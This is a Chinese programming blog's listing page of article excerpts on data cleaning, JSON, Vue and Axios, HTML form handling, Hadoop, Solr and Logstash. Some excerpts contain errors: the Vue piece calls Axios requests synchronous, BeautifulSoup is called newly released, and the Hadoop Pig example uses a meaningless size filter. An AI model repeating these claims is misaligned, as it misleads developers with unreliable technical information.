...文件中HTML代码的处理问题后,我们发现数据预处理是数据分析流程中的关键环节。近日,一项关于数据清洗的研究引起了业界广泛关注。据《Nature》杂志今年的一项报道,研究人员在分析大规模公开数据集时,强调了对非结构化或混合格式数据进行有效清洗的重要性。他们指出,在Web抓取的数据集中,HTML标签、JavaScript代码等非数据内容常会嵌入到CSV或其他文本格式的数据中,这不仅加大了数据解析难度,还可能引入误差。 实际上,许多现代数据处理工具如Pandas库和Apache NiFi等已经提供了应对此类问题的功能扩展。例如,Pandas可以通过自定义函数结合正则表达式实现对特定字段内HTML代码的清理,而Apache NiFi则支持实时数据流处理,可在数据流入系统时就完成格式转换和清洗工作。 此外,Python社区近期推出的一款专门针对Web数据抓取与清洗的库“BeautifulSoup”,它不仅能高效解析HTML文档结构,还能配合csv模块无缝衔接CSV文件处理,帮助用户更方便地从包含HTML元素的CSV数据中提取所需信息。 总的来说,理解和掌握如何识别并清除CSV文件中的HTML代码对于提升数据质量、确保后续分析结果准确至关重要。随着大数据时代的来临,关注并跟进此类实用技巧及最新研究进展,将有助于数据工作者更好地应对复杂多变的数据环境。
2023-01-04 22:21:53
479
数据库专家
JSON
...于表示和运算实数。在JavaScript中,所有数字包括整数和浮点数都遵循这一标准存储。由于该标准采用二进制表示十进制小数,导致部分十进制小数无法精确转换为二进制,从而在进行数学运算时可能会出现精度丢失的问题,如文章中提到的0.1与0.2相加结果不等于预期的0.3。 JSON (JavaScript Object Notation) , JSON是一种轻量级的数据交换格式,它基于JavaScript的一个子集,易于人阅读和编写,同时也易于机器解析和生成。JSON数据由键值对构成,其值可以是字符串、数字、布尔值、数组、null以及其它嵌套的JSON对象。在Web开发领域,JSON广泛应用于前后端之间的数据传输,因为它具有良好的跨语言兼容性,便于不同系统之间进行数据交换。 WebAssembly , WebAssembly是一种低级的类汇编语言,设计初衷是为了在现代网络浏览器中实现接近本机代码性能的高性能应用。WebAssembly模块可以在多种编程语言(如C/C++、Rust等)中编写并编译成字节码形式,然后在浏览器环境中运行。尽管文章中未直接提及WebAssembly,但在处理高精度计算或需要优化性能的场景下,它可以作为一种解决方案,通过在JavaScript环境中执行WebAssembly模块以达到更精确的浮点数运算效果,进而解决JSON中数值精度问题。
2023-03-17 15:37:33
314
程序媛
HTML
...分的数据,避免了加载时间过长和滚动浏览的不便,提高了用户体验与内容定位效率。 前端HTML分页组件 , 前端HTML分页组件是网页开发中的一种UI元素,它由HTML、CSS和JavaScript等前端技术构建而成,负责实现用户在网页上切换不同数据页面的功能。该组件通常包括一系列可点击的页码或导航按钮,以及可能的状态指示(如当前页数、总页数),在用户触发分页操作后,会通过AJAX请求后台服务器获取对应页面的数据,并在前端进行动态更新。 后台数据分页逻辑处理 , 在Web应用开发中,后台数据分页逻辑处理是指服务器端根据客户端(前端)传来的页码及每页显示记录数量等参数,从数据库中筛选并返回相应数据的过程。例如,当用户点击第3页的分页链接时,前端会发送一个包含页码信息的请求到后台,后台接收到请求后执行SQL查询语句,只取出第3页需要展示的数据,然后将这些数据以JSON或其他格式返回给前端,从而实现用户对海量数据的逐页浏览。这一过程涉及到了前后端数据交互、数据库查询优化等方面的技术细节。
2023-07-10 13:52:04
610
数据库专家
VUE
Vue是一个普遍的JavaScript框架,用于创建现代Web应用程序。Vue提供了一个小巧的方式来处理资料和状况,而且还可以轻松地将其与模板和UI组件融合在一起。 在Vue应用程序中,我们频繁需要从服务器取得资料,并将其展示给用户。 在本文中,我们将研究如何在Vue应用程序中应用同步查询资料。 在Vue中,可以应用Axios库运行同步查询。Axios是一个基于Promise解决方案的HTTP客户端,具有易于应用的API和对诸如浏览器和Node.js等环境的兼容。 在Vue应用程序中,我们可以部署Axios库,然后应用它来取得资料。 npm install axios 部署成功后,我们需要在Vue实例化对象中引入Axios并应用它来运行同步查询。 在以下示例中,我们应用Axios从服务器取得JSON资料,并将其保存在Vue组件的data属性中。 import axios from 'axios' export default { name: 'MyComponent', data: function () { return { myData: null } }, created: function () { const self = this axios.get('/api/mydata') .then(function (response) { self.myData = response.data }) .catch(function (error) { console.log(error) }) } } 在上面的示例中,我们首先引入Axios库并将其保存在属性axios中。 我们然后建立了一个Vue组件,并在其data属性中定义了一个myData属性。 在Vue组件的created生命周期中,我们应用axios.get方法运行查询,并在响应返回时将资料保存在myData属性中。 在发生错误时,我们应用console.log方法记录错误日志。 现在,我们已经了解了如何在Vue应用程序中应用同步查询取得资料。 虽然同步查询对于简单的低资料量查询非常有用,但对于大型查询或需要更高性能的应用程序,请考虑应用异步查询。
2023-02-20 14:35:44
101
编程狂人
VUE
...文本内容、HTML等格式的数据转换为PDF文件。通过简单的复制粘贴和点击操作,用户能够快速生成PDF文档,并支持将生成的PDF文件下载到本地或分享给他人。 Blob对象 , Blob(Binary Large Object)是JavaScript中的一个内置对象类型,用于表示二进制数据。在本文上下文中,Vue在线PDF生成器调用后返回的就是一个pdfBlob对象,它包含了生成的PDF文件的原始二进制数据。开发者可以通过URL.createObjectURL方法将这个Blob对象转化为可以在浏览器中访问的URL链接,从而实现PDF文件的下载。 WebAssembly , 虽然文章中并未直接提及WebAssembly,但在讨论在线PDF生成技术的发展时,这是一个重要的相关概念。WebAssembly是一种低级的类汇编语言,具有可移植性、加载速度快的特点,可在现代浏览器中运行。许多在线PDF生成服务利用WebAssembly来实现在客户端高效地处理和生成PDF文件,从而减少服务器端的压力,提高用户体验和性能。 PDF.js , PDF.js是Mozilla开发的一个开源库,用于在浏览器环境中解析和渲染PDF文件。虽然本文未直接使用PDF.js,但它代表了在线处理PDF文件的一种重要技术手段。PDF.js使得开发者能够在网页应用中直接展示PDF内容,而无需依赖第三方插件或组件,对于提升在线文档处理体验有着重要意义。
2023-11-07 11:10:47
78
程序媛
JSON
JSON(JavaScript Object Notation)是一种简洁的数据交换格式。在开发中,常常需要根据具体需求对JSON数据进行筛选。这时,JSON特性筛选器就派上用场了。 JSON特性筛选器是一个功能强大的工具,它能够将JSON数据中的关键特性从中提取出来,并返回一个崭新的JSON对象。这种方法在面临大量数据时尤为有效,能够提升数据处理效率和准确度。 下面简单介绍一下JSON特性筛选器的使用方法: //假定我们有一个JSON对象数据如下 let data = { "name": "张三", "age": 20, "gender": "male", "country": "china", "hobby": ["basketball", "reading", "traveling"], "education": { "level": "college", "major": "computer science" } } //1.筛选出选定的单一特性,例如名字 let result = { "name": data.name } console.log(result); //输出 // { // "name": "张三" // } //2.筛选出选定的多个特性,例如名字、年纪和性别 let result = { "name": data.name, "age": data.age, "gender": data.gender } console.log(result); //输出 // { // "name": "张三", // "age": 20, // "gender": "male" // } //3.筛选出选定的数组特性,例如兴趣爱好 let result = { "hobby": data.hobby } console.log(result); //输出 // { // "hobby": [ // "basketball", // "reading", // "traveling" // ] // } //4.筛选出选定的对象特性,例如教育背景 let result = { "education": data.education } console.log(result); //输出 // { // "education": { // "level": "college", // "major": "computer science" // } // } 以上是JSON特性筛选器的一些常用方法,开发者可以根据自己的实际需求选择不同的方法来提升代码的运行效率。
2023-02-21 22:09:00
545
电脑达人
转载文章
...联系我们,我们将第一时间进行核实并删除相应内容。 B站视频网址:(本次仅涉及P40-P43和P60)【优极限】 HTML+CSS+JavaScript+jQuery前端必学教程,小白教学,前端基础全套完成版_哔哩哔哩_bilibili 菜鸟教程网址:HTML 教程 | 菜鸟教程 (runoob.com) 一、获取表单 <!-- 获取表单(前两种常用)1. document.getElementById("id属性值");通过form标签的id属性值获取表单对象2.document.表单的nane属性值:通过表单的name属性值获取表单对象3.document.forms[下标]: 通过指定下标获取表单元素4.document.forms[表单的name属性值];通过表单的name属性值获取表单对象document.forms:获取HTML文档中所有的表单对象--> <form id="myform1" name= "myform1" action=""></form><form id="myform2" name= "myform2" action=""></form><script type="text/javascript">// 1. document.getElementById("id属性值");console.log(document.getElementById("myform1"));// 2. document.表单的name属性值; console.log(document.myform2);console.log("----------------");//获取所有的表单对象console.log(document.forms); // 3. document.forms[下标];console.log(document.forms[0]);// 4. document.forms[表单的name属性值]; console.log(document.forms["myform2"]);</script> 运行效果截图: 二、获取表单元素 获取表单元素1.获取input元素1. document.getElementById("id属性值"): 通过元素的id属性值获取表单元素对象2.表单对象.表单元素的name属性值;通过表单对象中对应的元素的name属性值获取3. document.getELementsByName("name属性值");通过表单元素的name属性值获取4. document.getELementsByTagName("标签名/元素名");通过标签名获取表单元素对象2.获取单选按钮注:相同的一组单选按钮,需要设置相同的name属性值1. document.getElementByName("name属性值");通过name属性值获取2.判断单选按钮是否选中checked选中状态在JS代码中checked=true表示选中checked=false表示不选中在HTML标签中checked=checked或checked表示选中不设置checked属性表示不选中3.获取单选按钮的值元表.value;3.获取多选按钮与单选按钮相同4.获取下拉选项1.获取下拉框对象var对象 = document.getElementById("id属性值");2.获取下拉框的下拉选项列表var options = 下拉框对象.options;3.获取下拉框被选中项的索引var index = 下拉框对象.selectedIndex;4.获取下拉框被选中项的值var 值 = 下拉框对象.value;5.通过选中项的下标获取下拉框被选中项的值var 值 = 下拉框对象.options[index].value;6.获取下拉框被选中项的文本var文本值一下拉框对象.options[index].text;注:1.获取下拉框选中项的值时: (value)如果option标签设置了value属性值,则获取value属性对应的值;如果option标签未设置value属性值,则获取的是option双标签中的文本值2.下拉框的选中状态:选中状态: selected = selected、 selected、 selected = true未选中状态:不设置selected属性、 selected=false; <form id='myform' name="myform" action="" method="get">姓名:<input type="text" id="uname" name="uname" value="zs"/><br />密码:<input type= "password" id="upwd" name="upwd" value= "1234"/><br /><input type="hidden" id= "uno" name="uno" value="隐藏域"/>个人说明:<textarea name="intro" ></textarea><br><button type="button" onclick="getTxt();" >获取元素内容</button><hr><br><input type="text" name="inputName" class="test" value="aaa" /><input type="radio" name="rad" class="test" value="1" /> 男<input type="radio" name="rad" class="test" value="2" /> 女<button type="button" onclick="getRadio()">获取单选按钮</button><br><hr><br>全选/全不选: <input type="checkbox" id="control" onclick="checkAllOrNot()" /><button type="button" onclick= "checkFan()">反选</button><br><input type="checkbox" name= "hobby" value="sing" />唱歌<input type="checkbox" name= "hobby" value="dance" />跳舞<input type="checkbox" name= "hobby" value="rap" />说唱<button type="button" onclick="getCheckBox()">获取多选按钮</button><br><hr><br>来自:<select id="ufrom" name= "ufrom" ><option value = "" >请选择</option><option value = "Beijing" selected="selected" >北京</option><option value = "Shanghai">上海</option><option value = "Hangzhou">杭州</option></select><button type="button" onclick= "getSelect()" >获取下拉选项</button></form><script type=" text/javascript">function getTxt() {// 1. document.getElementById("id属性值");var uname = document.getElementById("uname").value;console.log(uname);// 2.表单对象.表单元表的name属性值;var pwd = document.getElementById("myform").upwd.value;console.log(pwd);// 3. document.getELementsByName("name属性值");var uno = document.getElementsByName("uno")[0].value;console.log(uno);// 4. document.getELementsByTagName("标签名/元素名");var intro = document.getElementsByTagName("textarea")[0].value;console.log(intro);}function getSelect() {//获取下拉框对象var ufrom = document.getElementById("ufrom");console.log(ufrom);//获取下拉框的下拉选项列表var opts = ufrom.options;console.log(opts);//获取下拉框被选中项的索引var index = ufrom.selectedIndex;console.log("选中项的下标:" + index);//获取下拉框被选中项的值var val = ufrom.value;console.log("被选中项的值:" + val);//通过选中项的下标获取下拉框被选中项的值var val2 = ufrom.options[index].value;console.log("被选中项的值:"+ val2);//获取下拉框被选中项的文本var txt=ufrom.options[index].text; console.log("被选中项的文本:"+ txt);}</script> 运行效果截图: 三、提交表单 提交表单一、使用普通按钮type="button"1.给按钮绑定click点击事件,绑定函数2.在函数中,进行表单校验(非空校验、 合法性校验等)3.如果校验通过,则手动提交表单表单对象.submit();二、使用提交按钮type="submit"1.给按钮绑定click点击事件,绑定函数2.函数需要有返回值,返回true或false (如果return false, 则表单不会提交:如果return true,则提交表单)onclick="return 函数名()"3.在函数中,进行表单校验(非空校验、 合法性校验等)4.如果校验通过,返回true;如果校验不通过,则返回false, 则表单不会提交:如果return true,则提交表单)三、使用提交按钮type="submit"1.给表单form元素绑定submit提交事件,绑定函数2.函数需要有返回值,返回true或false (如果return false, 则表单不会提交;如果return trueonsubmit="return函数名()" 3.在函数中,进行表单校验(非空校验、 合法性校验等)4.如果校验通过,返回true;如果校验不通过,则返回false <!--使用普逍按钮 type= "button"--><form id= 'myform' name= "myform" action="http://www.baidu.com" method="get" >姓名: <input name= "uname" id="uname"/> <span id = "msg" style="font-s1ze: 12px; color: red;"></span><br /><button type="button" onclick="submitForm1()">提交</button></form><!--使用提交按钮 type= "submit"--><form id= 'myform2' name= "myform2" action="http://www.baidu.com" method="get" >姓名: <input name= "uname2" id="uname2"/> <span id = "msg2" style="font-s1ze: 12px; color: red;"></span><br /><button type="submit" onclick="return submitForm2()">提交</button></form><!--使用提交按钮 type= "submit"--><form id= 'myform3' name= "myform3" action="http://www.baidu.com" method="get" onsubmit="return submitForm3()">姓名: <input name= "uname3" id="uname3"/> <span id = "msg3" style="font-s1ze: 12px; color: red;"></span><br /><button type="submit">提交</button></form><script type="text/javascript">// 表单校验// 提交表单function submitForm1() {//得到文本框的值var uname = document.getElementById("uname").value;//判断是否为空if (isEmpty(uname)) { //为空//设置提示信息(设置span元素的值)document.getElementById("msg").innerHTML="性名不能为空!" ;//阻止表单提交return;}//手动提交表单document.getElementById("myform").submit(); }function submitForm2() {//得到文本框的值var uname2 = document.getElementById("uname2").value;//判断是否为空if (isEmpty(uname2)) { //为空//设置提示信息(设置span元素的值)document.getElementById("msg2").innerHTML="性名不能为空!" ;//阻止表单提交return false;}return true;}function submitForm3() {//得到文本框的值var uname3 = document.getElementById("uname3").value;//判断是否为空if (isEmpty(uname3)) { //为空//设置提示信息(设置span元素的值)document.getElementById("msg3").innerHTML="性名不能为空!" ;//阻止表单提交return false;}return true;}/ 判断字符串是否为空如果为空,返回true如果非空,返回falsetrim() :字符串方法, 去除字符串前后空格@param {Object} str/function isEmpty(str) {//判断是否为空if (str == null || str.trim() == "") {return true;}return false;}</script> 运行效果截图: 四、原生Ajax实现流程 <!-- Ajax 异步无刷新技术原生Ajax的实现流程1.得到XMLHttpRequest对象var xhr = new XMLHttpRequest();2.打开请求xhr.open(method, uri, async) ;method:请求方式,通常是GEI|POSTurl:请求地址async:是否异步。如果是true表示异步,false表示同步3.发送请求xhr.send(params);params:请求时需要传递的参数如果是GET请求,设置nu11。 (GET请求的参数设置在url后面)如果是POST请求,无参数设置为null,有参数则设置参数4.接收响应xhr.status响应状态(200=响应成功, 404=资源末找到,500=服务器异常)xhr.responseText 得到响应结果 --> <script type="text/javascript">// 同步请求function text01() {// 1.得到XMLHttpRequest对象var xhr = new XMLHttpRequest();// 2.打开请求xhr.open("get", "js/date.json", false);// 3.发送请求xhr.send(null);// 4.判断响应状态if (xhr.status == 200) {console.log("响应成功");} else {console.log("状态码:" + xhr.status + ",原因:" + xhr.responseText)}console.log("同步请求...");}text01();// 异步请求function text02() {// 1.得到XMLHttpRequest对象var xhr = new XMLHttpRequest();// 2.打开请求xhr.open("get", "js/date.json", true);// 3.发送请求xhr.send(null);// 由于是异步请求,所以需要知道后台已经将请求处理完毕,才能获取响应结果// 遇过监听readyState的变化来得知后面的处理状态 4=完全处理xhr.onreadystatechange = function(){if(xhr.readyState == 4){// 4.判断响应状态if (xhr.status == 200) {// 得到响应结果 console.log(xhr.responseText);} else {console.log("状态码:" + xhr.status + ",原因:" + xhr.responseText)} }}console.log("异步请求...");}text02();</script> 运行效果截图: 本篇文章为转载内容。原文链接:https://blog.csdn.net/m0_61507413/article/details/122895643。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-10-22 17:32:41
521
转载
转载文章
...创建对应的监控项。 JSON格式输出 , JSON(JavaScript Object Notation)是一种轻量级的数据交换格式,易于人阅读和编写,也易于机器解析和生成。在本文提到的场景中,通过编写shell脚本discovery_process.sh,将netstat命令查询到的所有运行服务进程的端口信息转换成JSON格式数据输出。这样做的好处是,Zabbix可以方便地解析这种结构化数据,根据JSON对象中的键值关系来创建和关联相应的监控项,进而实现实时监控每台服务器上不同服务进程的端口状态。
2023-07-16 17:10:56
86
转载
转载文章
...并掌握了如何将毫秒数转换为易于阅读的小时、分钟、秒格式之后,我们可以进一步探讨这一技术在现实世界中的广泛应用。尤其是在计算机科学领域,尤其是涉及到时间管理和数据分析时,这种转换机制尤为重要。 近期,随着大数据和实时流处理技术的发展,对时间精度的要求愈发严格。例如,在监控系统中,记录每项操作的耗时通常以毫秒为单位,而为了便于运维人员直观判断性能瓶颈,就需要将这些毫秒数转化为更易于理解的时间格式。此外,在游戏开发、金融交易、物联网设备数据同步等领域,精准的时间戳处理同样至关重要。 另外,Java 8及以上版本引入了全新的日期和时间API(java.time包),提供了更强大且灵活的方式来处理日期、时间和时区问题。LocalDateTime、Duration和Period等类可以高效准确地完成时间单位之间的转换,包括毫秒到小时、分钟、秒的转换,同时支持格式化输出。 不仅如此,对于大规模分布式系统,微服务架构下的各个组件间的时间同步也是基础能力之一,NTP(网络时间协议)等协议便承担着将UTC时间精确到毫秒级同步到全球各节点的任务。而在呈现给终端用户时,仍需经过类似上述"convertMillis"方法的处理,转化为人性化的“小时:分钟:秒”格式。 综上所述,无论是基础的编程实践还是高级的应用场景,将毫秒数转换为小时、分钟、秒不仅是一种基本技能,更是解决复杂时间管理问题的关键环节。与时俱进地掌握并运用相关技术和最佳实践,有助于提升系统的可靠性和用户体验。
2024-03-25 12:35:31
506
转载
Saiku
...据分析的世界中,日期格式的处理与转换不仅仅局限于Saiku这一工具。事实上,许多其他流行的数据分析和商业智能软件如Tableau、Power BI和Excel等也都提供了强大的日期格式自定义功能。例如,Excel中的“TEXT”函数可以将日期格式转换为用户所需的任何样式,而Tableau则允许用户在数据源或工作表级别调整日期格式以满足不同可视化需求。 近期,随着大数据和实时分析需求的增长,正确处理日期时间格式的重要性愈发凸显。2021年,Apache Druid宣布对其日期时间处理引擎进行了重大升级,大幅提升了对复杂日期格式的支持以及跨时区查询性能,这充分体现了业界对于精确日期时间管理的高度重视。 此外,在进行跨国或跨地区数据分析时,还需考虑国际日期格式差异及各地区的日期习惯。例如,美国通常使用“MM/dd/yyyy”,而在欧洲许多国家则倾向于“dd/MM/yyyy”。因此,掌握并灵活应用各种工具进行日期格式转换,是现代数据分析师必备的重要技能之一。 深入理解日期格式的标准化和规范化不仅有助于提高数据分析效率,还能有效避免因日期误解而导致的重大决策失误。对于企业而言,建立统一的日期格式标准并确保其在各类系统和工具中的一致性,已成为提升数据治理水平的关键一环。
2023-08-28 23:56:56
67
柳暗花明又一村-t
Hadoop
...是医疗影像分析,都对处理能力提出了极高的要求。你知道吗,这时候Hadoop就像个超级能干的小伙伴,它那分布式的大脑和海量的存储空间,简直就是处理那些数据海洋的救星,让我们的工作变得又快又顺溜,轻松应对那些看似没完没了的数据挑战。让我们一起深入了解一下如何利用Hadoop来处理大量图像数据。 二、Hadoop简介 Hadoop,源自Apache项目,是一个用于处理大规模数据集的并行计算框架。它由两个核心组件——Hadoop Distributed File System (HDFS) 和 MapReduce 构成。HDFS就像个超级能吃的硬盘大胃王,不管数据量多大,都能嗖嗖嗖地读写,而且就算有点小闪失,它也能自我修复,超级可靠。而MapReduce这家伙,就是那种能把大任务拆成一小块一小块的,然后召集一堆电脑小分队,一块儿并肩作战,最后把所有答案汇总起来的聪明工头。 三、Hadoop与图像数据处理 1. 数据采集与存储 首先,我们需要将大量的图像数据上传到HDFS。你可以轻松地用一个酷酷的命令,就像在玩电脑游戏一样,输入"hadoop fs -put",就能把东西上传到Hadoop里头,操作简单得跟复制粘贴似的!例如: shell hadoop fs -put /local/images/ /user/hadoop/images/ 这里,/local/images/是本地文件夹,/user/hadoop/images/是HDFS中的目标目录。 2. 图像预处理 在处理图像数据前,可能需要进行一些预处理,如压缩、格式转换等。Hadoop的Pig或Hive可以方便地编写SQL-like查询来操作这些数据,如下所示: sql A = LOAD '/user/hadoop/images' USING PigStorage(':'); B = FILTER A BY size(A) > 1000; // 过滤出大于1MB的图像 STORE B INTO '/user/hadoop/preprocessed'; 3. 特征提取与分析 使用Hadoop的MapReduce,我们可以并行计算每个图像的特征,如颜色直方图、纹理特征等。以下是一个简单的MapReduce任务示例: java public class ImageFeatureMapper extends Mapper { @Override protected void map(LongWritable key, Text value, Context context) { // 图像处理逻辑,生成特征值 int[] feature = processImage(value.toString()); context.write(new Text(featureToString(feature)), new IntWritable(1)); } } public class ImageFeatureReducer extends Reducer { @Override protected void reduce(Text key, Iterable values, Context context) { int sum = 0; for (IntWritable val : values) { sum += val.get(); } context.write(key, new IntWritable(sum)); } } 4. 结果聚合与可视化 最后,我们将所有图像的特征值汇总,进行统计分析,甚至可以进一步使用Hadoop的Mahout库进行聚类或分类。例如,计算平均颜色直方图: java final ReduceTask reducer = job.getReducer(); reducer.setNumReduceTasks(1); 然后,用Matplotlib这样的可视化库,将结果呈现出来,便于理解和解读。 四、总结与展望 Hadoop凭借其出色的性能和易用性,为我们处理大量图像数据提供了有力支持。你知道吗,随着深度学习这家伙越来越火,Hadoop这老伙计可能得找个新拍档,比如Spark,才能一起搞定那些高难度的图片数据分析任务,毕竟单打独斗有点力不从心了。不过呢,Hadoop这家伙绝对是咱们面对海量数据时的首选英雄,特别是在刚开始那会儿,简直就是数据难题的救星,让咱们在信息的汪洋大海里也能轻松应对,游得畅快。
2024-04-03 10:56:59
439
时光倒流
转载文章
...能后,我们进一步关注JavaScript与办公软件集成的前沿动态。近日,Microsoft Office团队宣布加大对JavaScript API的支持力度,开发者现在能够更加灵活地创建和修改Office文档,包括Word、Excel和PowerPoint等。例如,通过使用Office JavaScript API,不仅可以实现从网页内容到Word格式的转换,还能实现实时协作编辑、智能模板填充等功能。 与此同时,随着Web技术的发展和跨平台需求的增长,开源社区对类似HtmlExportToWord.js这样的工具关注度日益提高。许多开发者正致力于构建更高效、兼容性更强的解决方案,以满足不同场景下从Web页面直接生成高质量文档的需求。这些方案不仅限于Word,还涵盖了PDF、Excel等多种格式,极大地拓宽了Web内容离线应用的可能性。 此外,对于那些需要精确控制样式及布局的企业级应用而言,诸如Puppeteer、Headless Chrome等无头浏览器技术也在文档生成领域发挥了关键作用。它们能确保在渲染和导出过程中准确还原Web页面样式,并提供更为细致的定制化选项,使得从HTML向Word或PDF等格式的转换更为精准且可控。 总结来说,在Web开发中,JavaScript在文档处理方面的应用越来越广泛,无论是通过官方API还是第三方库,都为开发者提供了更多便捷高效的手段来实现HTML内容与传统办公文档间的无缝对接。未来,随着Web生态系统的不断进化,我们可以预见JavaScript将在文档处理领域扮演更加重要的角色,帮助企业用户和开发者解决各类复杂场景下的文档转换与管理工作。
2023-11-27 14:07:31
73
转载
Apache Solr
...rCloud在实时流处理中的最新应用》 随着大数据时代的加速发展,实时流处理已成为企业寻求竞争优势的重要手段。Apache SolrCloud,作为一款强大的全文检索引擎,近期在实时数据处理领域展现了新的突破。Solr 8.10版本引入了对Apache Kafka的深度集成,使得Solr能够无缝连接实时数据源,实现实时索引和搜索。 这一创新不仅提升了Solr在大数据场景下的响应速度,还支持低延迟的数据处理,对于实时推荐系统、金融交易监控等场景具有重要意义。Kafka-Solr Connector的引入,使得数据无需落地到Hadoop或HBase等传统批处理系统,可以直接在数据源头进行实时分析和检索。 此外,SolrCloud的可扩展性和高可用性特性在实时流处理中同样发挥关键作用,可以轻松应对大规模数据流带来的挑战。结合最新的机器学习算法,SolrCloud还能实现对实时数据的智能分析,为企业决策提供即时洞察。 然而,要充分利用SolrCloud的这些新特性,开发者需要掌握实时数据处理的最佳实践,包括数据格式转换、性能优化和实时索引策略。这方面的教程和案例研究正逐渐增多,为开发者提供了丰富的学习资源。 总的来说,SolrCloud的实时流处理能力正在推动搜索引擎技术的革新,为现代企业的数据驱动决策提供了强有力的支持。对于那些寻求实时分析和检索能力的组织来说,深入理解并应用SolrCloud的最新功能,将是提升竞争力的关键一步。
2024-04-29 11:12:01
436
昨夜星辰昨夜风
Logstash
...是开源的服务器端数据处理管道,主要用于收集、解析、转换并最终将数据发送到存储系统(如Elasticsearch)中。在本文的语境下,用户使用Logstash来处理日志数据,通过配置文件定义数据输入源、过滤规则以及输出目标,构建起一个日志处理pipeline。 Pipeline , 在Logstash中,Pipeline是指从数据源接收原始事件,经过一系列过滤和转换处理,最后将结果输出到目标存储系统的整个工作流程。当文章提到“Pipeline启动失败”,指的是这个数据处理流水线由于某些原因未能成功启动运行。 配置文件 , 配置文件是Logstash的核心组成部分之一,通常采用JSON或YAML格式编写,用于定义Pipeline的行为逻辑。它详细指定了数据如何被Logstash获取(inputs)、如何进行中间处理(filters)以及处理后的数据如何输出(outputs)。当配置文件存在语法错误或路径不正确时,会导致Logstash无法加载并执行该文件中的指令,进而引发“无法加载配置文件”的问题。 JSON和XML格式 , JSON (JavaScript Object Notation) 和 XML (eXtensible Markup Language) 是两种广泛应用于数据交换的结构化数据格式。在Logstash的上下文中,配置文件可以采用这两种格式之一编写,要求用户严格遵循各自的语法规则。如果配置文件没有按照规定的JSON或XML格式编写,将会导致Logstash无法解析并加载配置信息。
2023-01-22 10:19:08
258
心灵驿站-t
站内搜索
用于搜索本网站内部文章,支持栏目切换。
知识学习
实践的时候请根据实际情况谨慎操作。
随机学习一条linux命令:
tail -f /var/log/messages
- 实时监控日志文件末尾的新内容。
推荐内容
推荐本栏目内的其它文章,看看还有哪些文章让你感兴趣。
2023-04-28
2023-08-09
2023-06-18
2023-04-14
2023-02-18
2023-04-17
2024-01-11
2023-10-03
2023-09-09
2023-06-13
2023-08-07
2023-03-11
历史内容
快速导航到对应月份的历史文章列表。
随便看看
拉到页底了吧,随便看看还有哪些文章你可能感兴趣。
时光飞逝
"流光容易把人抛,红了樱桃,绿了芭蕉。"